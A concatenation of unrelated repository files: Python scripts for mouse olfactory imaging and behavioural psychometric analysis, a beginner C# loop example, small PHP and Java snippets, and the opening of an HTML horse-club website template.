highr = np.fft.ifft2(high)
return highr.real
def process_ref(mouse,date, extension=''):
path = 'C:/Turbo-SM/SMDATA/{0}_{1}_ref{2}'.format(mouse,date,extension)
assert os.path.exists(path), 'File path not found!'
spotpath = 'C:/VoyeurData/{0}/spots/{1}'.format(mouse, date)
if not os.path.exists(spotpath):
os.makedirs(spotpath)
tsmcount = 0
for tsm in os.listdir(path):
if not tsm.endswith('tsm'):
continue
tsmcount += 1
print 'processing file no. {0}: {1}'.format(tsmcount, tsm)
ref_frames = read_data(os.path.join(path, tsm))
ref_average = np.mean(ref_frames, axis=0)
ref_average = process_im(ref_average, bpass=False, cut=(0,256))
cv2.imwrite(os.path.join(path, 'ref_{0}_{1}_{2}.png'.format(mouse, date, tsmcount)), ref_average)
cv2.imwrite(os.path.join(spotpath, 'ref_{0}_{1}_{2}.png'.format(mouse, date, tsmcount)), ref_average)
return
def process_single_odorant(mouse,
date,
odorant,
ref=True,
average=True,
bpass=True,
resc_int=True,
scale=85,
cut=(5,251),
path=''
):
if path == '':
path = 'C:/Turbo-SM/SMDATA/{0}_{1}_{2}'.format(mouse, date, odorant)
else:
path = os.path.join(path, '{0}_{1}_{2}'.format(mouse, date, odorant))
assert os.path.exists(path), 'File path not found!'
spotpath = 'C:/VoyeurData/{0}/spots/{1}'.format(mouse, date)
if not os.path.exists(spotpath):
os.makedirs(spotpath)
odor_averaged = []
tsmcount = 0
if ref:
process_ref(mouse, date)
for tsm in os.listdir(path):
if not tsm.endswith('tsm'):
continue
tsmcount += 1
print 'processing file no. {0}: {1}'.format(tsmcount, tsm)
trialframes = read_data(os.path.join(path,tsm))
odor_normed = compute_average(trialframes, t1=500, t2=len(trialframes))
odor_final = process_im(odor_normed, cut=cut, bpass=bpass, scale=scale, resc_int=resc_int)
cv2.imwrite(os.path.join(path, '{0}_{1}_{2}_trial{3}.tif'.format(mouse, date, odorant, tsmcount)), odor_final)
cv2.imwrite(os.path.join(spotpath, '{0}_{1}_{2}_trial{3}.tif'.format(mouse, date, odorant, tsmcount)), odor_final)
plt.imshow(odor_final)
plt.show()
odor_averaged.append(odor_normed)
if len(odor_averaged) > 1:
if not average:
pass
average_final = np.mean(odor_averaged, axis=0)
average_final = process_im(average_final, cut=cut, bpass=bpass, scale=scale, resc_int=resc_int)
cv2.imwrite(os.path.join(path, '{0}_{1}_{2}_averaged.tif'.format(mouse, date, odorant)), average_final)
cv2.imwrite(os.path.join(spotpath, '{0}_{1}_{2}_averaged.tif'.format(mouse, date, odorant)), average_final)
plt.imshow(average_final)
plt.show()
pass
else:
pass
def process_imaging_sess(mouse,
date,
path='',
bpass=True,
resc_int = True,
ref=False
):
if path == '':
path = 'C:/Turbo-SM/SMDATA/'
for imgfolder in os.listdir(path):
if imgfolder.startswith('{0}_{1}'.format(mouse, date)):
if imgfolder.endswith('ref'):
continue
odorant = '_'.join(imgfolder.split('_')[2:])
process_single_odorant(mouse, date, odorant, ref=False, bpass=bpass, path=path, resc_int=resc_int)
if ref:
process_ref(mouse, date)
pass<file_sep>/pyformance.py
import h5py
import os
from collections import defaultdict as ddict
import pickle
from scipy.stats import binom
from scipy.optimize import minimize
from collections import OrderedDict
import matplotlib.pyplot as plt
import seaborn as sns
sns.set_style("white")
import numpy as np
def weibull(x, p):
t, b, a, g = p
k = -log(((1.0 - a) / (1.0 - g)) ** (1.0 / b))
y = 1.0 - (1.0 - g) * (e ** - (((k * x) / t) ** b))
return y
def weibull_chris(x, p):
"""
:param i: parameter value for the stimulus (ie intensity)
:param alpha:
:param beta:
:param guess:
:param lapse:
:return:
"""
alpha, beta, guess, lapse = p
return ((1. - lapse) - (1. - guess - lapse) *
np.exp(-(x / alpha) ** beta))
def find_fit(p, data):
bounds=[(0.001,None),(0.001,None),(0.001,1),(0.001,1)]
return minimize(logmaxlikelihood, p, args=data, method='L-BFGS-B', bounds=bounds)
def binom_logpmf(k, n, p):
"""
:param x: number of successes
:param n: number of trials shape parameter
:param p: probability shape parameter
:return:
"""
# v1 = log(binom_coeff(n, x))
# v1 = log(comb(n, x))
# v2 = x * log(p)
# v3 = (n - x) * log1p(-p) # log(1+(-p))
return binom.logpmf(k, n, p)
def logmaxlikelihood(p, args, f='weibull'):
'''
data structure:
x: array of independent variables, i.e. stimuli
k: array of number of successes for each x
n: array of total number of trials for each x
'''
t, b, a, g = p
x, k, n = args
res = weibull_chris(x, p)
return -np.sum(binom_logpmf(k, n, res))
def binP(N, p, x1, x2):
p = float(p)
q = p/(1-p)
k = 0.0
v = 1.0
s = 0.0
tot = 0.0
while(k<=N):
tot += v
if(k >= x1 and k <= x2):
s += v
if(tot > 10**30):
s = s/10**30
tot = tot/10**30
v = v/10**30
k += 1
v = v*q*(N+1-k)/k
return s/tot
def binomial_CI(vx, vN, vCL = 95):
'''
Calculate the exact (Clopper-Pearson) confidence interval for a binomial proportion
Usage:
>>> calcBin(13,100)
(0.07107391357421874, 0.21204372406005856)
>>> calcBin(4,7)
(0.18405151367187494, 0.9010086059570312)
'''
vx = float(vx)
vN = float(vN)
#Set the confidence bounds
vTU = (100 - float(vCL))/2
vTL = vTU
vP = vx/vN
if(vx==0):
dl = 0.0
else:
v = vP/2
vsL = 0
vsH = vP
p = vTL/100
while((vsH-vsL) > 10**-5):
if(binP(vN, v, vx, vN) > p):
vsH = v
v = (vsL+v)/2
else:
vsL = v
v = (v+vsH)/2
dl = v
if(vx==vN):
ul = 1.0
else:
v = (1+vP)/2
vsL =vP
vsH = 1
p = vTU/100
while((vsH-vsL) > 10**-5):
if(binP(vN, v, 0, vx) < p):
vsH = v
v = (vsL+v)/2
else:
vsL = v
v = (v+vsH)/2
ul = v
return (dl, ul)
def new_pfmcheck(pfm, sw, thresh):
if len(pfm) > sw:
pfmtrue = [p1 for p1 in pfm if not p1 == 'x']
avrg = np.mean(pfmtrue[-sw:])
if avrg < thresh:
return False
else:
return True
else:
return True
def new_analyse(mouse, session, plot=False, sw=20, thresh=0.59, multiple_c=False):
path = 'R:\\Rinberglab\\rinberglabspace\\Users\\Johannes\\taar_stim\\behavior'
resdict = ddict(lambda: [0, 0, 0])
pfm = []
filepath = '{0}\\{1}\\{0}_{2}_{3}.h5'.format(
mouse,
session,
session.split('-')[0],
session.split('-')[1]
)
assert os.path.exists(os.path.join(path, filepath)), '{0}/{1} does not exist!'.format(path, filepath)
h5file = h5py.File(os.path.join(path, filepath), 'r')
results = h5file['Trials']['result']
concs = h5file['Trials']['odorconc']
dmd = h5file['Trials']['stim_desc']
stimids = h5file['Trials']['stimid']
lpfm = []
rpfm = []
tpfm = []
cdict = {
'0.02': '0_100',
'0.01': '5_95',
'0.05': '25_75',
'0.076': '38_62',
'0.086': '43_57',
'0.114': '57_43',
'0.124': '62_38',
'0.15': '75_25',
'0.19': '95_5',
'0.2': '100_0'
}
ldict = {
'0.114': '57_43',
'0.124': '62_38',
'0.15': '75_25',
'0.19': '95_5',
'0.2': '100_0'
}
rdict = {
'0.02': '0_100',
'0.01': '5_95',
'0.05': '25_75',
'0.076': '38_62',
'0.086': '43_57',
}
lstims = [l for l in ldict.keys()]
rstims = [l for l in rdict.keys()]
stimiddict = {
'left' : [4, 9, 12, 15],
'right' : [2, 5, 10, 15]
}
for rno, r in enumerate(results):
if rno < sw:
continue
light = dmd[rno]
conc = concs[rno]
stimid = stimids[rno]
if str(conc) in lstims:
trialdir = 'left'
elif str(conc) in rstims:
trialdir = 'right'
else:
print 'Concentration not found in cdict:', str(conc)
break
if 'DMDoff' in light:
if multiple_c:
if int(stimid) in stimiddict[trialdir]:
stimtype = '{0}_{1}'.format(cdict[str(conc)], '1.5')
else:
stimtype = cdict[str(conc)]
else:
stimtype = cdict[str(conc)]
else:
stimtype = '{0}_{1}'.format(cdict[str(conc)], light[:2])
if r in [1, 4]: # left
if r == 4:
r = 0
lpfm.append(r)
tpfm.append(r)
else:
lpfm.append(r)
tpfm.append(r)
rpfm.append('x')
checkl = new_pfmcheck(lpfm, sw, thresh)
checkr = new_pfmcheck(rpfm, sw, thresh)
if checkl and checkr:
resdict[stimtype][0] += 1
elif r in [2, 3]: # right
if r == 3:
r = 0
rpfm.append(r)
tpfm.append(r)
else:
r = 1
rpfm.append(r)
tpfm.append(r)
lpfm.append('x')
checkl = new_pfmcheck(lpfm, sw, thresh)
checkr = new_pfmcheck(rpfm, sw, thresh)
if checkl and checkr:
resdict[stimtype][1] += 1
else: # no response
if concs[rno] in lstims:
lpfm.append(0)
rpfm.append('x')
tpfm.append(0)
else:
rpfm.append(0)
lpfm.append('x')
tpfm.append(0)
check = new_pfmcheck(tpfm, sw, thresh)
if check:
resdict[stimtype][2] += 1
if plot:
plt.figure(figsize=(14, 8))
for pfm in [lpfm, rpfm, tpfm]:
pfm_sw = []
for pno, p in enumerate(pfm):
if pno > sw:
pfmtrue = [p1 for p1 in pfm[:pno + 1] if not p1 == 'x']
avrg = round(np.mean(pfmtrue[-sw:]), 2)
elif pfm != []:
pfmtrue = [p1 for p1 in pfm[:pno + 1] if not p1 == 'x']
avrg = round(np.mean(pfmtrue[:]), 2)
elif p == 2:
avrg = 0
else:
avrg = p
pfm_sw.append(avrg)
plt.plot(pfm_sw)
plt.ylim(0, 1)
plt.legend(['left', 'right', 'total'])
plt.show()
return resdict
class Data:
def __init__(self, name, sw, thresh, multiple_c=False):
self.name = name
self.multiple_c = multiple_c
self.path = 'R:\\Rinberglab\\rinberglabspace\\Users\\Johannes\\taar_stim\\behavior'
assert os.path.exists(self.path), 'Network drive not connected!'
if not os.path.exists(os.path.join(self.path, 'mouse_data_{0}.p'.format(self.name))):
self.mouse_data = {'8202': {}}
with open(os.path.join(self.path, 'mouse_data_{0}.p'.format(self.name)), 'wb') as f:
pickle.dump(self.mouse_data, f)
else:
with open(os.path.join(self.path, 'mouse_data_{0}.p'.format(self.name)), 'rb') as f:
self.mouse_data = pickle.load(f)
self.sw = sw
self.thresh = thresh
def add_data(self, sessions):
for mouse in sessions.keys():
try:
mouse_dict = self.mouse_data[mouse]
except:
self.mouse_data[mouse] = {}
mouse_dict = self.mouse_data[mouse]
for session in sessions[mouse]:
if isinstance(session, list):
session = session[0]
if session in self.mouse_data[mouse].keys():
continue
else:
resdict = new_analyse(mouse, session, sw=self.sw, thresh=self.thresh, multiple_c=self.multiple_c)
self.mouse_data[mouse][session] = dict(resdict)
with open(os.path.join(self.path, 'mouse_data_{0}.p'.format(self.name)), 'wb') as f:
pickle.dump(self.mouse_data, f)
def plot_data(self, curve=True, probe=True, multiple_c=False, probe_curve=False, scatter=False):
plots = []
colors = {'odor + T3 stim': 'r', 'odor + T4 stim': 'g', 'odor': 'b', 'odor 1.5-fold': 'c'}
for mouse, sessions in sorted(self.mouse_data.items()):
fig, ax = plt.subplots(figsize=(10, 8))
sdict = ddict(list)
pdict = ddict(list)
x = []
curvedict = ddict(lambda: [[],[],[]])
for session in sessions:
for stim, result in self.mouse_data[mouse][session].items():
pdict[stim].append(result)
totalt = 0
for stim, result in sorted(pdict.items()):
mix = stim.split('_')
if len(mix) < 3:
mode = 'odor'
elif mix[2] == '1.5':
mode = 'odor 1.5-fold'
elif probe:
if 'T' in mix[2]:
mode = 'odor + {0} stim'.format(mix[2])
else:
continue
else:
continue
pea_c = round(float(stim.split('_')[0]) * 0.01, 2)
if not multiple_c:
if mode == 'odor 1.5-fold':
continue
performance = []
totalr = 0
silent = 0
left = 0
for [l, r, s] in result:
totalt += l + r + s
subtotal = l + r
totalr += subtotal
silent += s
left += l
if l > 0:
performance.append(float(l) / float(subtotal))
else:
performance.append(0.0)
if not mode == 'odor':
sf = float(s) / float(l + r + s)
sdict[stim].append(sf)
if scatter:
scatter_i = ax.scatter([pea_c] * len(performance), [performance], color=colors[mode], alpha=.3)
# plot mean
mean_l = float(left) / float(totalr)
scatter_m = ax.scatter([pea_c], [mean_l], color=colors[mode], marker='.', s=200, alpha=.9, label=mode)
# calculate,plot binomial confidence intervals
confint = binomial_CI(left, totalr)
c = confint[1] - confint[0]
c0 = confint[0] + c / 2
errb = ax.errorbar([pea_c], [c0], yerr=c / 2, linestyle='None', color=colors[mode], alpha=.6)
errb[-1][0].set_linestyle('--')
if mode == 'odor':
x.append(float(pea_c))
if not probe_curve:
if 'stim' in mode:
continue
curvedict[mode][0].append(float(pea_c))
curvedict[mode][1].append(float(totalr))
curvedict[mode][2].append(float(left))
# find curve fit
if curve:
p_chris = [.5, 3.5, .01, 0.0]
for mode in curvedict.keys():
fdata = [
np.array(curvedict[mode][0]),
np.array(curvedict[mode][2]),
np.array(curvedict[mode][1])
]
fit = find_fit(p_chris, fdata)
if fit.success:
x1 = np.arange(0., 1.01, 0.01)
p = fit.x
ax.plot(x1, weibull_chris(x1, p), alpha=.5, color=colors[mode])
handles, labels = plt.gca().get_legend_handles_labels()
by_label = OrderedDict(zip(labels, handles))
ax.legend(by_label.values(), by_label.keys(), loc='lower right')
ax.set_title(mouse)
ax.set_xlim(0, 1.0)
x.append(0.0)
x.append(1.0)
ax.set_xticks([x0 for x0 in x])
ax.set_yticks([y for y in np.arange(0.0, 1.1, 0.1)])
ax.set_ylim(0, 1.05)
ax.set_xlabel('% PEA in PEA/IPA', fontsize=12)
ax.set_ylabel('% responds like PEA', fontsize=12)
sns.despine()
sns.despine(left=True)
plt.savefig('MixtureAnalysis_{0}_{1}.pdf'.format(self.name, mouse), format='pdf', dpi=1200)
plt.savefig('MixtureAnalysis_{0}_{1}.png'.format(self.name, mouse), dpi=300)
plots.append(fig)
plt.show()
print 'Total # trials:', totalt
return plots
def plot_av(self, curve=True, probe=True, multiple_c=False, probe_curve=False, scatter=False):
avdata = ddict(lambda: np.array([0, 0, 0]))
for mouse in self.mouse_data.keys():
for date in self.mouse_data[mouse].keys():
for r in self.mouse_data[mouse][date].keys():
avdata[r] += np.array(self.mouse_data[mouse][date][r])
colors = {'odor + T3 stim': 'r', 'odor + T4 stim': 'g', 'odor': 'b', 'odor 1.5-fold': 'c'}
totalt = 0
x = []
fig, ax = plt.subplots(figsize=(10, 8))
curvedict = ddict(lambda: [[], [], []])
for stim, result in sorted(avdata.items()):
mix = stim.split('_')
if len(mix) < 3:
mode = 'odor'
elif mix[2] == '1.5':
mode = 'odor 1.5-fold'
elif probe:
if 'T' in mix[2]:
mode = 'odor + {0} stim'.format(mix[2])
else:
continue
else:
continue
pea_c = round(float(stim.split('_')[0]) * 0.01, 2)
performance = []
[l, r, s] = result
total = l + r + s
totalt += l + r + s
subtotal = l + r
# plot mean
mean_l = float(l) / float(subtotal)
scatter_m = ax.scatter([pea_c], [mean_l], color=colors[mode], marker='.', s=200, alpha=.9, label=mode)
# calculate,plot binomial confidence intervals
confint = binomial_CI(l, total)
c = confint[1] - confint[0]
c0 = confint[0] + c / 2
errb = ax.errorbar([pea_c], [c0], yerr=c / 2, linestyle='None', color=colors[mode], alpha=.6)
errb[-1][0].set_linestyle('--')
if mode == 'odor':
x.append(float(pea_c))
if not probe_curve:
if 'stim' in mode:
continue
curvedict[mode][0].append(float(pea_c))
curvedict[mode][1].append(float(subtotal))
curvedict[mode][2].append(float(l))
# find curve fit
p_chris = [.5, 3.5, .01, 0.0]
for mode in curvedict.keys():
fdata = [
np.array(curvedict[mode][0]),
np.array(curvedict[mode][2]),
np.array(curvedict[mode][1])
]
fit = find_fit(p_chris, fdata)
if fit.success:
x1 = np.arange(0., 1.01, 0.01)
p = fit.x
ax.plot(x1, weibull_chris(x1, p), alpha=.5, color=colors[mode])
handles, labels = plt.gca().get_legend_handles_labels()
by_label = OrderedDict(zip(labels, handles))
ax.legend(by_label.values(), by_label.keys(), loc='lower right')
ax.set_title('Average')
ax.set_xlim(0, 1.0)
x.append(0.0)
x.append(1.0)
ax.set_xticks([x0 for x0 in x])
ax.set_yticks([y for y in np.arange(0.0, 1.1, 0.1)])
ax.set_ylim(0, 1.05)
ax.set_xlabel('% PEA in PEA/IPA', fontsize=12)
ax.set_ylabel('% responds like PEA', fontsize=12)
sns.despine()
sns.despine(left=True)
plt.savefig('MixtureAnalysis_{0}_{1}.pdf'.format(self.name, 'average'), format='pdf', dpi=1200)
plt.savefig('MixtureAnalysis_{0}_{1}.png'.format(self.name, 'average'), dpi=300)
plt.show()
print 'Total # trials:', totalt
def plot_accp(self, mice=[]):
plots = []
for mouse, sessions in sorted(self.mouse_data.items()):
if not mouse in mice:
continue
fuckyoudict = ddict(list)
for session in sorted(sessions):
for stim, result in self.mouse_data[mouse][session].items():
fuckyoudict[stim].append(result)
pdict = ddict(list)
for stim, result in fuckyoudict.items():
totalr = 0
silent = 0
left = 0
for [l, r, s] in result:
mix = stim.split('_')
if len(mix) < 3:
mode = 'odor'
else:
mode = 'odor + {0} stim'.format(mix[2])
pea_c = round(float(stim.split('_')[0]) * 0.01, 2)
totalr += l + r
silent += s
left += l
if not mode == 'odor':
pdict[stim].append([float(l) / float(l + r), float(left) / float(totalr)])
nrows, ncols = 2, 2
fig = plt.figure(figsize=(12, 9))
stims = sorted([s for s in pdict.keys()])
for i in range(len(stims)):
ax = fig.add_subplot(nrows, ncols, i + 1)
ax.plot(range(len(sessions)), [x[0] for x in pdict[stims[i]]], alpha=.5)
ax.plot(range(len(sessions)), [x[1] for x in pdict[stims[i]]])
ax.set_xticklabels(sorted(sessions))
ax.set_yticks([y for y in np.arange(0.0, 1.1, 0.1)])
ax.set_ylim(0, 1.05)
ax.set_title(stims[i])
fig.tight_layout()
plots.append(fig)
plt.show()
return plots
def calc_stats(self):
for mouse, sessions in sorted(self.mouse_data.items()):
for session in sorted(sessions):
total = 0
for stim, result in self.mouse_data[mouse][session].items():
total += sum(result)
print mouse, session, 'Total # trials:', total
pass
<file_sep>/roipy.py
'''
Basic image processing functions for processing ROI images
Copyright E.Chong & J.Kappel 2017
'''
import pickle as p
import cv2
import os
import numpy as np
import matplotlib.pyplot as plt
import zipfile
def mask_image(img):
path = 'C:/voyeur_rig_config/PolygonMask.png'
assert os.path.exists(path), 'No PolygonMask.png in voyeur_rig_config!'
maskimg = cv2.imread(path)
maskimg = cv2.cvtColor(maskimg, cv2.COLOR_BGR2GRAY)
y, x = np.where(maskimg == 255)
mask = {'dx_start': x.min(),
'dx_stop': x.max(),
'dy_start': y.min(),
'dy_stop': y.max()
}
return img[mask['dy_start']:mask['dy_stop'],
mask['dx_start']:mask['dx_stop']]
pass
def create_projection(img, imgname, imgsource, bmp=False):
matrixpath = 'C:/voyeur_rig_config/Matrix.pkl'
assert os.path.exists(matrixpath), 'No Matrix.pkl in cwd!'
matrix = open((matrixpath), 'rb')
CAM2DMD = p.load(matrix)
img = mask_image(img)
warpimg = cv2.warpPerspective(img, CAM2DMD, (684, 608), borderMode=1, borderValue=1)
# switch rows and columns
warpimg = np.transpose(warpimg)
print 'Transforming image: {0}'.format(imgname)
for y, row in enumerate(warpimg):
for x, value in enumerate(row):
if not value in [0, 255]:
warpimg[y][x] = 255
if bmp:
cv2.imwrite(os.path.join(imgsource, 'transformed_{0}.bmp'.format(imgname.split('.')[0])), warpimg)
cv2.imwrite(os.path.join(imgsource, 'transformed_{0}.png'.format(imgname.split('.')[0])), warpimg)
pass
def shift_frame(img,rowshift, colshift):
### shifting rows and columns to move spots into FOS ###
width, height = img.shape
print 'Rows shifted: {0}. Columns shifted: {1}.'.format(rowshift, colshift)
img = np.insert(img, height, np.zeros((rowshift, width)), axis=0)
img = np.insert(img, 0, np.zeros((colshift, height + rowshift)), axis=1)
img = img[rowshift:height + rowshift, 0:width] * (2 ** 16)
return img
def transform_masks(mouse, date, rowshift=0, colshift=0):
path = 'C:/VoyeurData/{0}/spots/{1}'.format(mouse, date)
refimg = False
assert os.path.exists(path), 'Path for {0} does not exist!'.format(mouse)
for imgname in os.listdir(path):
if imgname.startswith('ref'):
refimg = True
img = plt.imread(os.path.join(path, imgname))
img = shift_frame(img,rowshift,colshift)
img = img.astype('uint16')
cv2.imwrite(os.path.join(path, 'shifted_{0}.png'.format(imgname.split('.')[0])), img)
elif imgname.startswith('Mask'):
img = plt.imread(os.path.join(path, imgname))
assert len(img.shape) == 2, 'Data format not 2-dimensional!'
assert len( np.unique( img ) ) == 2, 'Data format not binary!'
img = shift_frame(img,rowshift,colshift)
create_projection(img, imgname, path)
else:
continue
if not refimg:
print 'WARNING: No reference image was shifted!'
pass
def read_roi(fileobj):
if fileobj[:4] != 'Iout':
raise IOError('Magic number not found')
y1 = ord(fileobj[9:10])
x1 = ord(fileobj[11:12])
y2 = ord(fileobj[13:14])
x2 = ord(fileobj[15:16])
frame = np.zeros(256**2)
frame = frame.reshape(256, 256)
frame[y1:y2, x1:x2] = 255
return frame
def create_masks(mouse, date, transform=True):
path = 'C:/VoyeurData/{0}/spots/{1}'.format(mouse, date)
zf = zipfile.ZipFile(os.path.join(path,'RoiSet.zip'))
for roi in zf.namelist():
rfile = zf.open(roi, 'r')
fileobj = rfile.read()
frame = read_roi(fileobj)
cv2.imwrite(os.path.join(path, 'Mask_{0}.png'.format(roi[:3])), frame.astype('uint8'))
if transform:
create_projection(frame, 'Mask_{0}.png'.format(roi[:3]), path)
pass | 8e1aaa42154c65ada471a035d9acbcf769833016 | [
"Python"
] | 3 | Python | johannesmaxkappel/iospy | 390c96b88b05b265a6e3400949ccd07e2ddd5e22 | d761d11dc450b2321384cd34f22e55ba22555dd3 |
refs/heads/main | <file_sep>using System;
namespace Donguler
{
class Program
{
static void Main(string[] args)
{
string ilkUrun = "<NAME>";
string ikinciUrun = "Krem";
string uçuncuUrun = "Tablo";
string[] Urunler = new string[] {
ilkUrun, ikinciUrun, uçuncuUrun
};
int i;
for (i = 0; i < Urunler.Length; i++)
{
Console.WriteLine(Urunler[i]);
}
Console.WriteLine("\nWhile döngüsüne göre listelenmesi:");
int a = 0;
while (a < Urunler.Length)
{
Console.WriteLine(Urunler[a]);
a++;
}
//Farkların anlaşılması açısından farklı ürünler kullanacağım foreach'te.
Console.WriteLine("\nForeach döngüsüne göre listelenmesi:");
Product urun1 = new Product();
urun1.adi = "kalem";
urun1.marka = "FaberCastell";
urun1.fiyat = 30;
Product urun2 = new Product();
urun2.adi = "Defter";
urun2.marka = "Mopak";
urun2.fiyat = 15;
Product[] urunler = new Product[] { urun1, urun2 };
foreach (var urun in urunler)
{
Console.WriteLine(urun1.adi + " " + urun1.marka + " " + urun1.fiyat + " " + urun2.adi + " " + urun2.marka + " " + urun2.fiyat);
} //Burada ürünlerin özelliklerini yani adını,markasını,fiyatını yazar.
}
class Product
{
public int fiyat { get; set; }
public string adi { get; set; }
public string marka { get; set; }
}
}
}
| 85a398aa1a6a58df32bc1a93ab23aee63c53c2b9 | [
"C#"
] | 1 | C# | SaraAkman/My_works | 1950f0c741aa2001ac0c89591907f7aa758bc3e5 | c297514f1b415ca6f14f15ff05f0c0f9e6e89c98 |
refs/heads/master | <repo_name>EstebanVillarreal/pruebasV-git<file_sep>/programa.php
<?php
print "<NAME>"
?> | ed41f7bca43c97bdfd50617d7798c411c2d7e1d9 | [
"PHP"
] | 1 | PHP | EstebanVillarreal/pruebasV-git | 137cd5994d6498713f7b69e8774cc4a1fddbb544 | 4cc552524eef7763f8844fc81628972476d34d93 |
refs/heads/master | <repo_name>xucyy/life<file_sep>/README.md
# life
我的学习记录生活
<file_sep>/src/main/java/com/xucy/life/controller/TestController.java
package com.xucy.life.controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
/**
* @Author xucy
* @Date 2019-09-03 17:07
* @Description
**/
@RestController
@RequestMapping("/testCon")
public class TestController {
@RequestMapping("/test")
public String test(){
return "成功1122";
}
}
| 25ddc5e1ab6d1e7e451b83672c606bdfa8409d7b | [
"Markdown",
"Java"
] | 2 | Markdown | xucyy/life | 3fdcc8e4ae43f90a28d7360f9bc3e11a77406bd1 | 588570425217b82bd7b44f12465bf7c63ec5f4b3 |
refs/heads/master | <repo_name>ColdShadows/Hello_World<file_sep>/Hello_World/Program.cs
//states the libraries used in this program
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
//creates namespace called "Hello_World" for the program and all of its classes
namespace Hello_World
{
//creates a new class called "Program"
class Program
{
//main function for the class
static void Main(string[] args)
{
//creates a string variable to first and last name, and assigns a value to each
//string firstName = "Travis";
//string lastName = "Kean";
string firstName = null;
string lastName = null;
//Prompts the user to enter both first and last name
Console.WriteLine("Enter your first name");
firstName = Console.ReadLine();
Console.WriteLine("Good job, now enter your last name");
lastName = Console.ReadLine();
Console.WriteLine();
//displays output for 2 seperate lines for different orders of the first and last name, seperated by a comma
Console.WriteLine(firstName + ", " + lastName + "\n");
Console.WriteLine(lastName + ", " + firstName + "\n" );
//Writes the string inside to a command line
Console.WriteLine("Hello World " + firstName + " " + lastName);
//Allows the entering of a string, and finishes after pressing the new line carriage return.
Console.ReadLine();
}
}
}
| 5f866419bd050d51648ba54b698fa65a07f06c9a | [
"C#"
] | 1 | C# | ColdShadows/Hello_World | f3640a4fa3c931909d3f18461452cc871788dfda | c4c522e2989f96b15156a6d3010b69c6a052d384 |
refs/heads/master | <file_sep> <!DOCTYPE html>
<html lang="zxx" class="no-js">
<head>
<!-- Mobile Specific Meta -->
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Favicon-->
<link rel="shortcut icon" href="img/fav.png">
<!-- Author Meta -->
<meta name="author" content="codepixer">
<!-- Meta Description -->
<meta name="description" content="">
<!-- Meta Keyword -->
<meta name="keywords" content="">
<!-- meta character set -->
<meta charset="UTF-8">
<!-- Site Title -->
<title>Horse Club</title>
<link rel="stylesheet" href="css/linearicons.css">
<link rel="stylesheet" href="css/font-awesome.min.css">
<link rel="stylesheet" href="css/bootstrap.css">
<link rel="stylesheet" href="css/magnific-popup.css">
<link rel="stylesheet" href="css/nice-select.css">
<link rel="stylesheet" href="css/animate.min.css">
<link rel="stylesheet" href="css/owl.carousel.css">
<link rel="stylesheet" href="css/main.css">
</head>
<body>
<?php include "header.php" ?>
<!-- start banner Area -->
<section class="banner-area relative" id="home">
<div class="overlay overlay-bg"></div>
<div class="container">
<div class="row fullscreen d-flex align-items-center justify-content-start">
<div class="banner-content col-lg-12">
<h6>Introducing Horse Club</h6>
<span class="bar"></span>
<h1 class="text-white">
Inter relation <br>
Between Horse & Rider
</h1>
<a href="#" class="genric-btn">Book Consultancy</a>
</div>
</div>
</div>
</section>
<!-- End banner Area -->
<!-- Start about-video Area -->
<section class="about-video-area section-gap">
<div class="container">
<div class="row">
<div class="col-lg-6 about-video-left">
<h6 class="text-uppercase">Brand new app to blow your mind</h6>
<h1>
We’ve made a life <br>
that will change you
</h1>
<p>
<span>We are here to listen from you deliver exellence</span>
</p>
<p>
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed doeiusmo d tempor incididunt ut labore et dolore magna aliqua.
</p>
<a class="primary-btn" href="#">Get Started Now</a>
</div>
<div class="col-lg-6 about-video-right justify-content-center align-items-center d-flex">
<a class="play-btn" href="https://www.youtube.com/watch?v=ARA0AxrnHdM"><img class="img-fluid mx-auto" src="img/play.png" alt=""></a>
</div>
</div>
</div>
</section>
<!-- End about-video Area -->
<!-- Start feature Area -->
<section class="feature-area relative pt-100 pb-20">
<div class="overlay overlay-bg"></div>
<div class="container">
<div class="row align-items-center justify-content-center">
<div class="col-lg-4 col-md-6">
<div class="single-feature">
<a href="#"><h4 class="text-white">Expert Technicians</h4></a>
<p>
Usage of the Internet is becoming more common due to rapid advancement of technology and power.
</p>
</div>
</div>
<div class="col-lg-4 col-md-6">
<div class="single-feature">
<a href="#"><h4 class="text-white">Professional Service</h4></a>
<p>
Usage of the Internet is becoming more common due to rapid advancement of technology and power.
</p>
</div>
</div>
<div class="col-lg-4 col-md-6">
<div class="single-feature">
<a href="#"><h4 class="text-white">Great Support</h4></a>
<p>
Usage of the Internet is becoming more common due to rapid advancement of technology and power.
</p>
</div>
</div>
<div class="col-lg-4 col-md-6">
<div class="single-feature">
<a href="#"><h4 class="text-white">Technical Skills</h4></a>
<p>
Usage of the Internet is becoming more common due to rapid advancement of technology and power.
</p>
</div>
</div>
<div class="col-lg-4 col-md-6">
<div class="single-feature">
<a href="#"><h4 class="text-white">Highly Recomended</h4></a>
<p>
Usage of the Internet is becoming more common due to rapid advancement of technology and power.
</p>
</div>
</div>
<div class="col-lg-4 col-md-6">
<div class="single-feature">
<a href="#"><h4 class="text-white">Positive Reviews</h4></a>
<p>
Usage of the Internet is becoming more common due to rapid advancement of technology and power.
</p>
</div>
</div>
</div>
</div>
</section>
<!-- End feature Area -->
<!-- Start home-about Area -->
<section class="home-about-area section-gap">
<div class="container">
<div class="row">
<div class="col-lg-6 home-about-left">
<img class="mx-auto d-block img-fluid" src="img/about-img.png" alt="">
</div>
<div class="col-lg-6 home-about-right">
<h6 class="text-uppercase">Brand new app to blow your mind</h6>
<h1>We’ve made a life <br>
that will change you</h1>
<p>
<span>We are here to listen from you deliver exellence</span>
</p>
<p>
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Sed ut perspiciatis unde omnis.
</p>
<a class="primary-btn" href="#">Get Started Now</a>
</div>
</div>
</div>
</section>
<!-- End home-about Area -->
<!-- Start price Area -->
<section class="price-area section-gap">
<div class="container">
<div class="row d-flex justify-content-center">
<div class="menu-content pb-70 col-lg-8">
<div class="title text-center">
<h1 class="mb-10">Choose the best plan that suits you</h1>
